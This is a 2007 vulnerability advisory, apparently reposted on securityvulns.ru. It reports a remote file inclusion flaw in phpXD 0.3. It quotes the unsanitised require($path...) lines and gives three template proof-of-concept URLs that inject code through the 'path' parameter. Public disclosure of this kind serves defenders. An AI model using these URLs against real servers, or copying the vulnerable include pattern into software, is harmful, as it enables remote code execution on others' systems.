Computer Security

Security Advisory: phpXD <= 0.3 (path) Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:24.01.2007
Subject:phpXD <= 0.3 (path) Remote File Inclusion Vulnerability

              _________________________________
     ________|                                 |________
     \       |              Dr Max Virus       |       /
      \      |                                 |      /
      /      |_________________________________|      \
     /___________)                         (___________\
---------------------------------------------------------------------------------
---------------------------------------
Script:phpxd
Affected Version:0.3
Downlaoad:http
://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz
---------------------------------------------------------------------------------
---------------------------------------
Author:Dr Max Virus
---------------------------------------------------------------------------------
---------------------------------------
Bug in (include/)
Vul Code;
require($path."include/dom/Node.php");
require($path."include/dom/Attr.php");
require($path."include/dom/CharacterData.php");
require($path."include/dom/Comment.php");
require($path."include/dom/Document.php");
---------------------------------------------------------------------------------
---------------------------------------
POC:
http://[target]/[path]/include/dom.php?path=[Bad Code]
http://[target]/[path]/include/dtd.php?path=[Bad Code]
http://[target]/[path]/include/parser.php?path=[Bad Code]
---------------------------------------------------------------------------------
---------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
---------------------------------------------------------------------------------
---------------------------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru